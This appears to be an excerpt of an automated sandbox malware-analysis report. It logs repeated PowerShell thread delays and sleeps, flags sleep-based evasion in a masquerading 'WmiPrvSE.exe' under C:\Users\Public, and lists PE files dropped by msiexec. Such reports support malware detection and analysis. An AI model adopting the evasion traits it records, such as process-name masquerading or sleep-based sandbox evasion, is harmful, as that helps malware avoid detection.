Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_00775854		23_2_00775854
Source: C:\Users\Public\WmiPrvSE.exe	Code function: 23_2_0076FA1C		23_2_0076FA1C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899796	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899669	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899695
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899577
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899465
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899124
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899009
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898765
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898522
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898406
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898294
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898136
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898001
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897843
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897718
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897600
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897261
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897149
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897043
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896922
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896812
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896702
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896593
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896482
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896374
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896265
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896134
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899874
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899762
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899531
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899421
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899306
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899201
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899093
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898869
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898654
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898491
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898354
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898131
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897897
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897795
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897684
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897578
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897340
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897233
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897112
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896779
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896671
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896432
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899889
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899781
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899665
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899561
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899344
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899219
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 899109
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898997
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898850
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898714
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898576
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898466
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898359
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898242
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898125
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 898015
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897902
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897795
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897672
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897563
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897453
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897343
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897234
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897105
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 897000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 896770
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5726	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3884	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5797	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 987	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4162	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1016	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1347
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7253
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1393
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5906
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1752
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8199
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1208
Source: C:\Users\Public\WmiPrvSE.exe	Window / User API: threadDelayed 1847
Source: C:\Users\Public\WmiPrvSE.exe	Window / User API: threadDelayed 8069

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI4080.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI40EF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI4020.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI44AA.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI40BF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI4060.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI3FB2.tmp	Jump to dropped file

Source: C:\Users\Public\WmiPrvSE.exe

Code function: 23_2_0076FA1C

23_2_0076FA1C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep count: 5726 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180	Thread sleep count: 3884 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1992	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1160	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736	Thread sleep count: 4162 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -900000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -899796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7464	Thread sleep time: -899669s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3340	Thread sleep count: 1016 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1976	Thread sleep count: 5060 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -18446744073709540s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -899859s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -899695s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -899577s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -899465s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -899343s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -899234s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -899124s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -899009s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -898890s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -898765s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep count: 1347 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -898640s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -898522s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -898406s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -898294s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -898136s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -898001s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -897843s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -897718s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -897600s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -897484s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -897374s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -897261s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -897149s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -897043s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -896922s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -896812s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -896702s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -896593s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -896482s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -896374s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -896265s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep time: -896134s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6548	Thread sleep count: 7253 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -900000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -899874s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -899762s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -899640s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300	Thread sleep count: 1393 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -899531s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -899421s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -899306s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -899201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -899093s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898984s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898869s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898758s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898654s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898491s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898354s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898248s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898131s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -898015s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897897s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897795s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897684s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897578s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897448s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897340s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897233s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897112s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -897000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -896890s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -896779s >= -30000s
